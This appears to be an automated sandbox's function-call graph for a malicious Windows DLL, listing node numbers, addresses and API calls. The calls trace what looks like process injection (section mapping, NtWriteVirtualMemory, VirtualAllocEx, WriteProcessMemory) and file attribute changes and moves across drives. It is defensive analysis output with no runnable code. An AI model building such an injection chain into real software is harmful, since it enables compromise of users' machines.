API calls 11457->11459 11458->11455 11459->11457 11461 1000ccd0 11460->11461 11462 1000cd1f Sleep 11460->11462 11463 1000ccea lstrcmpi 11461->11463 11464 1000cd1e 11461->11464 11462->11445 11463->11461 11464->11462 11465->11453 11466->11453 11468 1000c91c 11467->11468 11495 10008604 HeapAlloc 11468->11495 11470 1000ca14 11470->11288 11475 1000a86d 11470->11475 11471 100095e1 HeapAlloc 11473 1000c9b7 11471->11473 11472 100085d5 2 API calls 11472->11473 11473->11470 11473->11471 11473->11472 11474 100091e3 HeapAlloc 11473->11474 11474->11473 11476 1000a886 11475->11476 11496 1000a7bc 11476->11496 11479->11297 11509 1000c4ce 11480->11509 11483 1000cc72 FreeLibrary 11486 1000cc80 11483->11486 11485 1000cca1 11485->11297 11486->11485 11489 1000861a 2 API calls 11486->11489 11488 1000cbaa memset 11490 1000cbdf 11488->11490 11489->11485 11491 1000cbe7 NtProtectVirtualMemory 11490->11491 11492 1000cc67 11490->11492 11491->11492 11493 1000cc29 NtWriteVirtualMemory 11491->11493 11492->11483 11492->11486 11493->11492 11494 1000cc46 NtProtectVirtualMemory 11493->11494 11494->11492 11495->11473 11497 100122d3 _ftol2_sse 11496->11497 11498 1000a7d4 11497->11498 11499 100095c7 HeapAlloc 11498->11499 11500 1000a7fe 11499->11500 11505 10009601 11500->11505 11502 1000a85c 11503 100085c2 2 API calls 11502->11503 11504 1000a867 11503->11504 11504->11297 11506 1000874f memset 11505->11506 11507 10009615 _vsnprintf 11506->11507 11508 1000962f 11507->11508 11508->11502 11510 1000c4ea 11509->11510 11511 1000c4fc 11509->11511 11510->11511 11512 1000c627 11510->11512 11513 100095e1 HeapAlloc 11511->11513 11512->11492 11534 1000c6c0 11512->11534 11514 1000c509 11513->11514 11515 10009640 2 API calls 11514->11515 11516 1000c542 11515->11516 11517 100095e1 HeapAlloc 11516->11517 11518 1000c55f 11517->11518 11552 100092e5 11518->11552 11521 100085d5 2 API calls 11522 1000c587 11521->11522 11523 100092e5 2 API calls 11522->11523 11524 1000c5aa LoadLibraryW 11523->11524 11526 1000c5d5 11524->11526 11527 1000c5e3 11524->11527 11528 1000e171 3 API calls 11526->11528 11529 1000861a 2 API calls 11527->11529 11528->11527 11530 1000c5f8 memset 11529->11530 11530->11512 11531 1000c619 11530->11531 11532 1000861a 2 API calls 11531->11532 11533 1000c625 11532->11533 11533->11512 11535 1000c6f4 11534->11535 11536 1000c715 NtCreateSection 11535->11536 11551 1000c880 11535->11551 11537 1000c73e RegisterClassExA 11536->11537 11536->11551 11538 1000c790 CreateWindowExA 11537->11538 11539 1000c7cc GetCurrentProcess NtMapViewOfSection 11537->11539 11538->11539 11544 1000c7ba DestroyWindow UnregisterClassA 11538->11544 11545 1000c7f7 NtMapViewOfSection 11539->11545 11539->11551 11540 1000c8d2 GetCurrentProcess NtUnmapViewOfSection 11541 1000c8e5 11540->11541 11542 1000c8f8 11541->11542 11543 1000c8ed NtClose 11541->11543 11542->11488 11542->11492 11543->11542 11544->11539 11546 1000c81e 11545->11546 11545->11551 11547 10008669 HeapAlloc 11546->11547 11548 1000c82e 11547->11548 11549 1000c839 VirtualAllocEx WriteProcessMemory 11548->11549 11548->11551 11550 1000861a 2 API calls 11549->11550 11550->11551 11551->11540 11551->11541 11554 100092f7 11552->11554 11558 10008604 HeapAlloc 11554->11558 11555 10009333 11555->11521 11556 10009316 11556->11555 11557 10009322 lstrcatW 11556->11557 11557->11556 11558->11556 11679 10008604 HeapAlloc 11559->11679 11561 10009b6d 11562 10005c45 11561->11562 11680 1000b5f6 11561->11680 11562->11302 11562->11303 11598 1000fb19 11562->11598 11565 100095c7 HeapAlloc 11566 10009bb0 11565->11566 11567 10009ceb 11566->11567 11572 10009bdc 11566->11572 11568 10009d3c 11567->11568 11569 10009cfd 11567->11569 11570 10009292 2 API calls 11568->11570 11571 10009ce7 11569->11571 11573 10009292 2 API calls 11569->11573 11570->11571 11574 100085c2 2 API calls 11571->11574 11572->11571 11690 10009292 11572->11690 11573->11571 11576 10009d5c 11574->11576 11577 1000861a 2 API calls 11576->11577 11585 10009db2 11576->11585 11578 10009d9b memset 11577->11578 11580 1000861a 2 API calls 11578->11580 11580->11585 11581 100095e1 HeapAlloc 11582 10009c3f 11581->11582 11583 100092e5 2 API calls 11582->11583 11586 10009c51 11583->11586 11584 10009292 2 API calls 11590 10009cc8 11584->11590 11585->11585 11587 1000861a 2 API calls 11585->11587 11588 100085d5 2 API calls 11586->11588 11587->11562 11589 10009c5f 11588->11589 11696 10009256 11589->11696 11591 1000861a 2 API calls 11590->11591 11591->11571 11594 1000861a 2 API calls 11595 10009c96 11594->11595 11596 1000861a 2 API calls 11595->11596 11597 10009ca1 11596->11597 11597->11584 11704 10008604 HeapAlloc 11598->11704 11600 1000fb20 11601 1000fb2a 11600->11601 11705 1000a6a9 11600->11705 11601->11303 11604 1000fb6e 11604->11303 11606 1000fb55 11607 1000f8cc 15 API calls 11606->11607 11608 1000fb6b 11607->11608 11608->11303 11610 1000a86d 5 API calls 11609->11610 11611 10005d9a 11610->11611 11612 10005974 8 API calls 11611->11612 11614 10005c6e 11611->11614 11613 10005dd4 11612->11613 11613->11614 11737 10009ebb 11613->11737 11614->11307 11614->11308 11617 10005de6 lstrcmpiW 11617->11614 11619 1000a86d 5 API calls 11618->11619 11620 1000598d 11619->11620 11621 1000599a 11620->11621 11622 10009292 2 API calls 11620->11622 11623 100059bd 11622->11623 11761 1000590c 11623->11761 11625 100059cd 11626 100059f1 11625->11626 11629 1000590c 2 API calls 11625->11629 11627 1000861a 2 API calls 11626->11627 11628 100059fd 11627->11628 11630 10005bc4 11628->11630 11629->11626 11631 10009ebb 3 API calls 11630->11631 11632 10005bce 11631->11632 11633 10005bd7 11632->11633 11634 10005bdc lstrcmpiW 11632->11634 11633->11320 11635 10005bf2 11634->11635 11636 10005c14 11634->11636 11766 10009f6c 11635->11766 11637 1000861a 2 API calls 11636->11637 11637->11633 11809 10008604 HeapAlloc 11641->11809 11643 10005b11 11644 10005b24 GetDriveTypeW 11643->11644 11645 10005b55 11643->11645 11644->11645 11810 10005a7b 11645->11810 11647 10005b71 11648 10005ba1 11647->11648 11827 10004d6d 11647->11827 11913 1000a39e 11648->11913 11652 1000a39e 2 API calls 11653 10005bbd 11652->11653 11653->11309 11655 1000109a HeapAlloc 11654->11655 11656 1000f8db 11655->11656 12414 100061b4 memset 11656->12414 11659 100085d5 2 API calls 11660 1000f901 11659->11660 11674 1000f978 11660->11674 12426 10009e66 11660->12426 11664 1000f92c 11665 1000109a HeapAlloc 11664->11665 11664->11674 11666 1000f93e 11665->11666 11667 10009640 2 API calls 11666->11667 11668 1000f94d 11667->11668 11669 1000a911 2 API calls 11668->11669 11670 1000f95e 11669->11670 11671 1000f96c 11670->11671 12432 1000a239 11670->12432 11673 1000861a 2 API calls 11671->11673 11673->11674 11674->11320 11676 10005a73 11675->11676 12440 10005631 11676->12440 11679->11561 11681 1000b60f 11680->11681 11682 1001242d _ftol2_sse 11681->11682 11683 1000b61f 11682->11683 11684 100095c7 HeapAlloc 11683->11684 11685 1000b62e 11684->11685 11686 1000b66a 11685->11686 11689 1001242d _ftol2_sse 11685->11689 11687 100085c2 2 API calls 11686->11687 11688 10009b91 11687->11688 11688->11565 11689->11685 11691 100092a4 11690->11691 11702 10008604 HeapAlloc 11691->11702 11693 100092c1 11694 100092cd lstrcatA 11693->11694 11695 100092de 11693->11695 11694->11693 11695->11576 11695->11581 11695->11597 11697 1000928c 11696->11697 11698 1000925f 11696->11698 11697->11594 11703 10008604 HeapAlloc 11698->11703 11700 10009271 11700->11697 11701 10009279 MultiByteToWideChar 11700->11701 11701->11697 11702->11693 11703->11700 11704->11600 11706 1000a6c2 11705->11706 11710 1000a6bb 11705->11710 11709 1000a6f0 11706->11709 11706->11710 11732 10008604 HeapAlloc 11706->11732 11708 1000861a 2 API calls 11708->11710 11709->11708 11709->11710 11710->11604 11711 1000f9bf 11710->11711 11733 10008604 HeapAlloc 11711->11733 11713 1000f9d2 11718 1000fb10 11713->11718 11731 1000fabc 11713->11731 11734 1000109a 11713->11734 11716 1000861a 2 API calls 11716->11718 11717 100095e1 HeapAlloc 11719 1000fa2c 11717->11719 11718->11606 11720 100092e5 2 API calls 11719->11720 11721 1000fa49 11720->11721 11722 1000a6a9 3 API calls 11721->11722 11723 1000fa56 11722->11723 11724 100085d5 2 API calls 11723->11724 11725 1000fa62 11724->11725 11726 100085d5 2 API calls 11725->11726 11728 1000fa6b 11726->11728 11727 1000861a 2 API calls 11729 1000fab1 11727->11729 11728->11727 11730 1000861a 2 API calls 11729->11730 11730->11731 11731->11716 11732->11709 11733->11713 11735 10008531 HeapAlloc 11734->11735 11736 100010b5 11735->11736 11736->11717 11740 10009f95 11737->11740 11741 10009fbe 11740->11741 11752 10009b0e 11741->11752 11743 10005de2 11743->11614 11743->11617 11744 10009fc9 11744->11743 11755 1000be9b 11744->11755 11746 1000a095 11747 1000861a 2 API calls 11746->11747 11747->11743 11748 1000a070 11750 1000861a 2 API calls 11748->11750 11749 10009ffd 11749->11746 11749->11748 11751 10008669 HeapAlloc 11749->11751 11750->11746 11751->11748 11759 10008604 HeapAlloc 11752->11759 11754 10009b1a 11754->11744 11756 1000bec1 11755->11756 11758 1000bec5 11756->11758 11760 10008604 HeapAlloc 11756->11760 11758->11749 11759->11754 11760->11758 11762 1000591c 11761->11762 11765 10005917 11761->11765 11763 10005934 GetLastError 11762->11763 11764 1000593f GetLastError 11762->11764 11763->11765 11764->11765 11765->11625 11767 10009f7c 11766->11767 11782 1000a0ab 11767->11782 11770 1000b1b1 SetFileAttributesW memset 11771 1000b1ec 11770->11771 11772 1001242d _ftol2_sse 11771->11772 11781 1000b1ff 11771->11781 11773 1000b21b 11772->11773 11774 10009640 2 API calls 11773->11774 11775 1000b22c 11774->11775 11776 100092e5 2 API calls 11775->11776 11777 1000b23d 11776->11777 11777->11781 11797 1000b0de 11777->11797 11780 1000861a 2 API calls 11780->11781 11781->11636 11783 1000a0c8 11782->11783 11787 10005c08 11782->11787 11784 1001242d _ftol2_sse 11783->11784 11783->11787 11785 1000a112 11784->11785 11796 10008604 HeapAlloc 11785->11796 11787->11636 11787->11770 11788 1000a126 11788->11787 11789 100122d3 _ftol2_sse 11788->11789 11790 1000a168 11789->11790 11791 10009b0e HeapAlloc 11790->11791 11794 1000a1b4 11791->11794 11792 1000a21e 11793 1000861a 2 API calls 11792->11793 11793->11787 11794->11792 11795 1000861a 2 API calls 11794->11795 11795->11792 11796->11788 11798 1000b101 11797->11798 11799 1000b109 memset 11798->11799 11808 1000b178 11798->11808 11800 100095e1 HeapAlloc 11799->11800 11801 1000b125 11800->11801 11802 1001242d _ftol2_sse 11801->11802 11803 1000b141 11802->11803 11804 10009640 2 API calls 11803->11804 11805 1000b157 11804->11805 11806 100085d5 2 API calls 11805->11806 11807 1000b160 MoveFileW 11806->11807 11807->11808 11808->11780 11809->11643 11921 10001080 11810->11921 11815 100085c2 2 API calls 11817 10005ab7 11815->11817 11816 10005af7 11816->11647 11817->11816 11818 10001080 HeapAlloc 11817->11818 11819 10005ac5 11818->11819 11931 10008910 11819->11931 11822 10005ae1 11824 100085c2 2 API calls 11822->11824 11825 10005aeb 11824->11825 11826 1000861a 2 API calls 11825->11826 11826->11816 11828 10004d91 11827->11828 11829 10004de7 11827->11829 11831 100095c7 HeapAlloc 11828->11831 11830 1000b7a8 10 API calls 11829->11830 11881 10004e1d 11829->11881 11832 10004dfc 11830->11832 11833 10004d9b 11831->11833 11834 1000a86d 5 API calls 11832->11834 11835 100095c7 HeapAlloc 11833->11835 11836 10004e08 11834->11836 11837 10004dab 11835->11837 12027 1000a471 11836->12027 11837->11829 11840 10004db9 GetModuleHandleA 11837->11840 11839 10004e14 11843 1000e1bc 6 API calls 11839->11843 11839->11881 11841 10004dc6 GetModuleHandleA 11840->11841 11842 10004dcd 11840->11842 11841->11842 11845 100085c2 2 API calls 11842->11845 11844 10004e37 11843->11844 11846 100095e1 HeapAlloc 11844->11846 11847 10004dde 11845->11847 11848 10004e48 11846->11848 11849 100085c2 2 API calls 11847->11849 11850 100092e5 2 API calls 11848->11850 11849->11829 11851 10004e60 11850->11851 11852 100085d5 2 API calls 11851->11852 11854 10004e73 11852->11854 11853 10004e9c 11856 1000861a 2 API calls 11853->11856 11854->11853 12032 1000896f 11854->12032 11858 10004ead 11856->11858 11857 10004e8f 11857->11853 11860 1000a2e3 6 API calls 11857->11860 12052 10004a0b memset 11858->12052 11860->11853 11863 100095e1 HeapAlloc 11865 100051fd 11863->11865 11866 100092e5 2 API calls 11865->11866 11872 10005215 11866->11872 11867 10005245 11869 100085d5 2 API calls 11867->11869 11868 1000e2c6 42 API calls 11870 10004f64 11868->11870 11871 10005251 lstrcpynW lstrcpynW 11869->11871 11873 10004fb3 11870->11873 11878 10005082 11870->11878 11906 100051f1 11870->11906 11874 10005296 11871->11874 11872->11867 11875 1000861a 2 API calls 11872->11875 11880 10004fbc 11873->11880 11873->11906 11876 1000861a 2 API calls 11874->11876 11875->11867 11877 100052a8 11876->11877 11879 1000861a 2 API calls 11877->11879 11878->11906 12126 1000fc1f 11878->12126 11879->11881 12121 10008604 HeapAlloc 11880->12121 11881->11648 11884 10005006 11884->11881 11887 100095e1 HeapAlloc 11884->11887 11889 1000501f 11887->11889 11888 10005110 11892 1000109a HeapAlloc 11888->11892 11888->11906 11890 10009640 2 API calls 11889->11890 11891 10005052 11890->11891 11893 100085d5 2 API calls 11891->11893 11894 10005129 11892->11894 11895 1000505c 11893->11895 11896 1000902d _ftol2_sse 11894->11896 12122 1000a911 memset 11895->12122 11898 1000514b 11896->11898 12137 100060df 11898->12137 11901 1000861a 2 API calls 11901->11881 11903 100051e2 11904 1000861a 2 API calls 11903->11904 11904->11906 11905 10009640 2 API calls 11907 100051ba 11905->11907 11906->11863 11908 100085d5 2 API calls 11907->11908 11909 100051c4 11908->11909 11910 1000a911 2 API calls 11909->11910 11911 100051d6 11910->11911 11912 1000861a 2 API calls 11911->11912 11912->11903 11914 1000a3ad 11913->11914 11920 10005bb5 11913->11920 11915 1000861a 2 API calls 11914->11915 11918 1000a3d2 11914->11918 11915->11914 11916 1000861a 2 API calls 11917 1000a3dd 11916->11917 11919 1000861a 2 API calls 11917->11919 11918->11916 11919->11920 11920->11652 11922 100084ab HeapAlloc 11921->11922 11923 10001096 11922->11923 11924 1000a51a 11923->11924 11925 1000a538 11924->11925 11926 1001242d _ftol2_sse 11925->11926 11930 10005aa7 11925->11930 11927 1000a552 FindResourceA 11926->11927 11927->11925 11928 1000a580 11927->11928 11929 10008669 HeapAlloc 11928->11929 11928->11930 11929->11930 11930->11815 11932 1000891f 11931->11932 11938 10005ad4 11931->11938 11950 10008604 HeapAlloc 11932->11950 11934 10008929 11934->11938 11951 10008815 11934->11951 11937 1000861a 2 API calls 11937->11938 11938->11822 11939 1000a2e3 11938->11939 11986 10008a90 11939->11986 11943 1000a397 11943->11822 11944 1000a38f 12001 10008cc0 11944->12001 11947 1000a2fd 11947->11943 11947->11944 11948 10008698 3 API calls 11947->11948 11992 10009749 11947->11992 11997 100091a6 11947->11997 11948->11947 11950->11934 11961 10008604 HeapAlloc 11951->11961 11953 100088d6 11954 1000861a 2 API calls 11953->11954 11955 10008837 11953->11955 11954->11955 11955->11937 11955->11938 11956 1000882a 11956->11953 11956->11955 11962 1000ebf0 11956->11962 11959 100088f0 11960 1000861a 2 API calls 11959->11960 11960->11955 11961->11956 11977 10008604 HeapAlloc 11962->11977 11964 1000ec14 11965 1000ed7f 11964->11965 11978 10008604 HeapAlloc 11964->11978 11968 1000861a 2 API calls 11965->11968 11967 1000ec2c 11967->11965 11979 10008604 HeapAlloc 11967->11979 11969 1000eda5 11968->11969 11971 1000861a 2 API calls 11969->11971 11972 1000edb3 11971->11972 11973 100088cf 11972->11973 11974 1000861a 2 API calls 11972->11974 11973->11953 11973->11959 11974->11973 11975 1000ec42 11975->11965 11980 10008698 11975->11980 11977->11964 11978->11967 11979->11975 11985 10008604 HeapAlloc 11980->11985 11982 100086d5 11982->11975 11983 100086ad 11983->11982 11984 1000861a 2 API calls 11983->11984 11984->11982 11985->11983 11987 10008ab3 11986->11987 11988 10008604 HeapAlloc 11987->11988 11989 10008be7 11987->11989 11990 1000861a 2 API calls 11987->11990 11988->11987 11991 10008604 HeapAlloc 11989->11991 11990->11987 11991->11947 11993 1000974b 11992->11993 11994 10009780 SetLastError 11993->11994 11995 1000978c SetLastError 11993->11995 11996 10009799 11994->11996 11995->11996 11996->11947 11999 100091b1 11997->11999 12000 100091c7 11997->12000 12013 10008604 HeapAlloc 11999->12013 12000->11947 12002 10008d57 12001->12002 12004 10008ccf 12001->12004 12002->11943 12003 10008d09 12005 10008d19 12003->12005 12014 10008de5 12003->12014 12004->12002 12004->12003 12006 1000861a 2 API calls 12004->12006 12008 10008d34 12005->12008 12009 1000861a 2 API calls 12005->12009 12006->12004 12010 10008d4a 12008->12010 12012 1000861a 2 API calls 12008->12012 12009->12008 12011 1000861a 2 API calls 12010->12011 12011->12002 12012->12010 12013->12000 12021 10008604 HeapAlloc 12014->12021 12016 10008e28 12016->12005 12017 10008e1e 12017->12016 12019 10008e61 12017->12019 12022 1000879d 12017->12022 12020 1000861a 2 API calls 12019->12020 12020->12016 12021->12017 12023 1001242d _ftol2_sse 12022->12023 12026 100087b6 12023->12026 12024 100087e3 12024->12019 12025 1001242d _ftol2_sse 12025->12026 12026->12024 12026->12025 12028 1000a485 12027->12028 12029 1000a495 GetLastError 12028->12029 12030 1000a48b GetLastError 12028->12030 12031 1000a4a2 12029->12031 12030->12031 12031->11839 12147 10008604 HeapAlloc 12032->12147 12034 10008990 12035 100089a1 lstrcpynW 12034->12035 12042 1000899a 12034->12042 12036 10008a14 12035->12036 12037 100089c4 12035->12037 12148 10008604 HeapAlloc 12036->12148 12039 1000a6a9 3 API calls 12037->12039 12041 100089d0 12039->12041 12040 10008a1f 12040->12042 12043 10008a39 12040->12043 12047 1000861a 2 API calls 12040->12047 12041->12043 12044 10008815 3 API calls 12041->12044 12042->11857 12046 10008a61 12043->12046 12049 1000861a 2 API calls 12043->12049 12045 100089ea 12044->12045 12045->12040 12048 100089f0 12045->12048 12050 1000861a 2 API calls 12046->12050 12047->12043 12051 1000861a 2 API calls 12048->12051 12049->12046 12050->12042 12051->12042 12053 10004a41 12052->12053 12054 10004a76 12053->12054 12149 10002ba4 12053->12149 12055 1000b7a8 10 API calls 12054->12055 12066 10004ae2 12054->12066 12057 10004a8d 12055->12057 12058 1000b67d 4 API calls 12057->12058 12059 10004a9d 12058->12059 12165 100049c7 12059->12165 12061 10004aa7 12062 1000b88a 4 API calls 12061->12062 12063 10004acd 12062->12063 12176 10002c8f 12063->12176 12066->11906 12116 1000e2c6 12066->12116 12067 100092e5 2 API calls 12069 10004af8 12067->12069 12068 10004b5e 12070 10004b65 12068->12070 12071 10004bc6 12068->12071 12069->12068 12073 100095e1 HeapAlloc 12069->12073 12074 10004b4c 12069->12074 12245 1000c292 12070->12245 12075 100091e3 HeapAlloc 12071->12075 12077 10004b24 12073->12077 12074->12068 12238 1000e286 12074->12238 12079 10004bcf 12075->12079 12210 1000bfec 12077->12210 12081 100091e3 HeapAlloc 12079->12081 12082 10004bc2 12081->12082 12087 10009b43 8 API calls 12082->12087 12084 10004b99 12088 1000861a 2 API calls 12084->12088 12085 10004bae 12090 1000861a 2 API calls 12085->12090 12086 100085d5 2 API calls 12086->12074 12089 10004bfa 12087->12089 12088->12066 12089->12066 12254 10009f48 12089->12254 12090->12082 12093 10009f6c 4 API calls 12094 10004c1f 12093->12094 12095 1000a0ab 4 API calls 12094->12095 12096 10004c41 12095->12096 12097 10004c52 12096->12097 12258 1000a3ed 12096->12258 12099 10004c60 12097->12099 12101 1000a3ed 7 API calls 12097->12101 12100 1000980c GetSystemTimeAsFileTime 12099->12100 12102 10004c67 12100->12102 12101->12099 12103 1000a0ab 4 API calls 12102->12103 12106 10004c82 12103->12106 12104 10004cd8 12271 100052c0 12104->12271 12105 1000fc1f 8 API calls 12105->12106 12106->12104 12106->12105 12266 1000553f 12106->12266 12110 10004d4d lstrcpyW 12110->12066 12111 10004d0e 12112 1000109a HeapAlloc 12111->12112 12113 10004d18 lstrcpyW 12112->12113 12114 100085d5 2 API calls 12113->12114 12115 10004d2f lstrcatW lstrcatW lstrcatW 12114->12115 12115->12066 12117 1000e2fa 12116->12117 12119 10004f40 12117->12119 12318 10008604 HeapAlloc 12117->12318 12319 10004905 12117->12319 12119->11868 12119->11870 12121->11884 12123 1000a943 12122->12123 12124 1000506e 12123->12124 12125 1000a98a GetExitCodeProcess 12123->12125 12124->11901 12125->12124 12127 1000fc43 12126->12127 12128 100050fa 12126->12128 12129 10008669 HeapAlloc 12127->12129 12128->11906 12136 10008604 HeapAlloc 12128->12136 12130 1000fc4d 12129->12130 12130->12128 12131 100060df 4 API calls 12130->12131 12135 1000fc8e 12130->12135 12133 1000fcac 12131->12133 12132 1000861a 2 API calls 12132->12128 12133->12135 12378 1000f7e3 12133->12378 12135->12132 12136->11888 12138 100060ea 12137->12138 12139 10005168 12137->12139 12413 10008604 HeapAlloc 12138->12413 12139->11903 12139->11905 12141 100060f4 12141->12139 12142 1000109a HeapAlloc 12141->12142 12143 1000610b 12142->12143 12144 100092e5 2 API calls 12143->12144 12145 1000612c 12144->12145 12146 100085d5 2 API calls 12145->12146 12146->12139 12147->12034 12148->12040 12150 10002bc0 12149->12150 12151 1000109a HeapAlloc 12150->12151 12164 10002c5c 12150->12164 12152 10002bd3 12151->12152 12153 100092e5 2 API calls 12152->12153 12154 10002be5 12153->12154 12155 100085d5 2 API calls 12154->12155 12156 10002bf0 12155->12156 12157 1000109a HeapAlloc 12156->12157 12158 10002bfa 12157->12158 12283 1000bf37 12158->12283 12161 100085d5 2 API calls 12162 10002c16 12161->12162 12163 1000861a 2 API calls 12162->12163 12163->12164 12164->12054 12166 10009256 2 API calls 12165->12166 12167 100049d2 12166->12167 12168 100095e1 HeapAlloc 12167->12168 12169 100049e1 12168->12169 12170 100092e5 2 API calls 12169->12170 12171 100049ed 12170->12171 12172 100085d5 2 API calls 12171->12172 12173 100049f8 12172->12173 12174 1000861a 2 API calls 12173->12174 12175 10004a03 12174->12175 12175->12061 12290 1000b700 12176->12290 12178 10002ca8 12179 10002cb4 12178->12179 12180 10002d29 12178->12180 12181 1000109a HeapAlloc 12179->12181 12182 10002ba4 4 API calls 12180->12182 12183 10002cbe 12181->12183 12184 10002d3b 12182->12184 12189 10002ce8 12183->12189 12190 10002cdf 12183->12190 12185 10002d40 12184->12185 12186 10002d8a 12184->12186 12306 1000b012 memset memset 12185->12306 12187 10002c64 3 API calls 12186->12187 12198 10002d26 12187->12198 12194 1000109a HeapAlloc 12189->12194 12299 10002c64 12190->12299 12191 10002d4b 12193 1000109a HeapAlloc 12191->12193 12196 10002d55 12193->12196 12197 10002cf2 12194->12197 12195 10002ce4 12201 100085d5 2 API calls 12195->12201 12199 100092e5 2 API calls 12196->12199 12200 100092e5 2 API calls 12197->12200 12202 10002dc1 12198->12202 12203 10002d9f CreateDirectoryW 12198->12203 12204 10002d7a 12199->12204 12205 10002d0f 12200->12205 12201->12198 12202->12066 12202->12067 12207 10002dab 12203->12207 12208 100085d5 2 API calls 12204->12208 12206 100085d5 2 API calls 12205->12206 12206->12195 12207->12202 12209 1000861a 2 API calls 12207->12209 12208->12198 12209->12202 12211 1000c00b 12210->12211 12213 10004b42 12210->12213 12212 100095e1 HeapAlloc 12211->12212 12211->12213 12216 1000c054 12212->12216 12213->12086 12214 1000c0f2 12215 100085d5 2 API calls 12214->12215 12215->12213 12216->12214 12311 10008604 HeapAlloc 12216->12311 12218 1000c0e8 12218->12214 12219 1000c0f9 12218->12219 12220 100095e1 HeapAlloc 12219->12220 12221 1000c103 12220->12221 12222 10009640 2 API calls 12221->12222 12223 1000c11b 12222->12223 12224 1000c1ab 12223->12224 12225 1000c170 12223->12225 12226 1000c131 12223->12226 12228 1000861a 2 API calls 12224->12228 12229 10009640 2 API calls 12225->12229 12227 10009640 2 API calls 12226->12227 12230 1000c149 12227->12230 12231 1000c1d1 12228->12231 12232 1000c16b 12229->12232 12233 10009640 2 API calls 12230->12233 12234 100085d5 2 API calls 12231->12234 12237 1000a911 2 API calls 12232->12237 12233->12232 12235 1000c1da 12234->12235 12236 100085d5 2 API calls 12235->12236 12236->12213 12237->12224 12239 100095e1 HeapAlloc 12238->12239 12240 1000e29c 12239->12240 12241 1000bfec 6 API calls 12240->12241 12242 1000e2b4 12241->12242 12243 100085d5 2 API calls 12242->12243 12244 1000e2bd 12243->12244 12244->12068 12246 1000a86d 5 API calls 12245->12246 12247 1000c2a4 12246->12247 12248 100095c7 HeapAlloc 12247->12248 12249 1000c2ae 12248->12249 12250 10009292 2 API calls 12249->12250 12251 1000c2bd 12250->12251 12252 100085c2 2 API calls 12251->12252 12253 10004b6e 12252->12253 12253->12084 12253->12085 12255 10009f55 12254->12255 12255->12255 12256 1000a0ab 4 API calls 12255->12256 12257 10004c16 12256->12257 12257->12093 12259 1000a46a 12258->12259 12263 1000a400 12258->12263 12259->12097 12261 10009749 2 API calls 12261->12263 12262 1000a424 GetLastError 12262->12263 12263->12259 12263->12261 12263->12262 12264 1000a0ab 4 API calls 12263->12264 12265 10009f48 4 API calls 12263->12265 12312 10009ed0 12263->12312 12264->12263 12265->12263 12270 10005564 12266->12270 12267 10005626 12267->12106 12268 1000a6a9 3 API calls 12268->12270 12269 1000861a 2 API calls 12269->12270 12270->12267 12270->12268 12270->12269 12272 100052d6 12271->12272 12273 100052ef 12271->12273 12317 10008604 HeapAlloc 12272->12317 12275 10008698 3 API calls 12273->12275 12276 100052e0 12275->12276 12277 1000b88a 4 API calls 12276->12277 12282 10004cf8 12276->12282 12278 10005344 12277->12278 12279 100122d3 _ftol2_sse 12278->12279 12280 10005377 12279->12280 12281 1000902d _ftol2_sse 12280->12281 12281->12282 12282->12066 12282->12110 12282->12111 12284 1000bf64 12283->12284 12287 10002c08 12284->12287 12289 10008604 HeapAlloc 12284->12289 12286 1000bf94 12286->12287 12288 1000861a 2 API calls 12286->12288 12287->12161 12288->12287 12289->12286 12291 100095c7 HeapAlloc 12290->12291 12292 1000b71a 12291->12292 12293 1001242d _ftol2_sse 12292->12293 12296 1000b74f 12293->12296 12294 1000b793 12295 100085c2 2 API calls 12294->12295 12297 1000b7a1 12295->12297 12296->12294 12298 1001242d _ftol2_sse 12296->12298 12297->12178 12298->12296 12300 1000109a HeapAlloc 12299->12300 12301 10002c73 12300->12301 12302 100091e3 HeapAlloc 12301->12302 12303 10002c7d 12302->12303 12304 100085d5 2 API calls 12303->12304 12305 10002c88 12304->12305 12305->12195 12307 1000b062 12306->12307 12308 1000b946 5 API calls 12307->12308 12309 1000b067 12308->12309 12310 1000b0c5 lstrcpynW 12309->12310 12310->12191 12311->12218 12313 10009f95 3 API calls 12312->12313 12314 10009ee9 12313->12314 12315 10009eff 12314->12315 12316 1000861a 2 API calls 12314->12316 12315->12263 12316->12315 12317->12276 12318->12117 12320 10004928 12319->12320 12321 10004995 12320->12321 12322 10004a0b 37 API calls 12320->12322 12321->12117 12324 10004948 12322->12324 12323 10004986 12337 100047ca 12323->12337 12324->12321 12324->12323 12327 1000ad44 12324->12327 12328 1000ad65 12327->12328 12333 1000ad5e 12327->12333 12329 1000ad71 GetLastError 12328->12329 12330 1000ad79 12328->12330 12329->12333 12331 1000b998 6 API calls 12330->12331 12332 1000ad8b 12331->12332 12332->12333 12334 1000adea 12332->12334 12335 1000ada2 memset 12332->12335 12333->12324 12336 1000861a 2 API calls 12334->12336 12335->12334 12336->12333 12338 100060df 4 API calls 12337->12338 12339 100047ef 12338->12339 12340 100047fb 12339->12340 12341 1000109a HeapAlloc 12339->12341 12340->12321 12342 1000481a 12341->12342 12343 100092e5 2 API calls 12342->12343 12344 1000482c 12343->12344 12345 100085d5 2 API calls 12344->12345 12346 1000483a 12345->12346 12347 10002ba4 4 API calls 12346->12347 12348 1000484c 12347->12348 12363 100048d8 12348->12363 12364 10006144 12348->12364 12350 1000861a 2 API calls 12351 100048e5 12350->12351 12353 1000861a 2 API calls 12351->12353 12353->12340 12354 100095e1 HeapAlloc 12355 10004878 12354->12355 12356 100092e5 2 API calls 12355->12356 12357 1000488f 12356->12357 12358 100085d5 2 API calls 12357->12358 12359 1000489d 12358->12359 12360 100048be 12359->12360 12362 10006144 7 API calls 12359->12362 12361 1000861a 2 API calls 12360->12361 12361->12363 12362->12360 12363->12350 12373 10008604 HeapAlloc 12364->12373 12366 10006154 12367 1000902d _ftol2_sse 12366->12367 12372 10004869 12366->12372 12368 1000617c 12367->12368 12374 1000c263 12368->12374 12371 1000861a 2 API calls 12371->12372 12372->12354 12372->12363 12373->12366 12375 1000c274 12374->12375 12376 1000bfec 6 API calls 12375->12376 12377 1000618b 12376->12377 12377->12371 12379 1000f883 12378->12379 12380 1000f7fe 12378->12380 12382 1000109a HeapAlloc 12379->12382 12381 1000109a HeapAlloc 12380->12381 12383 1000f809 12381->12383 12384 1000f88d 12382->12384 12406 10008604 HeapAlloc 12383->12406 12386 10006144 7 API calls 12384->12386 12387 1000f89e 12386->12387 12390 100085d5 2 API calls 12387->12390 12388 1000f817 12389 1001242d _ftol2_sse 12388->12389 12391 1000f833 12389->12391 12392 1000f8a9 12390->12392 12393 10009640 2 API calls 12391->12393 12394 1000f8b5 12392->12394 12396 1000f9bf 4 API calls 12392->12396 12395 1000f845 12393->12395 12398 1000861a 2 API calls 12394->12398 12397 1000a911 2 API calls 12395->12397 12396->12394 12399 1000f855 12397->12399 12405 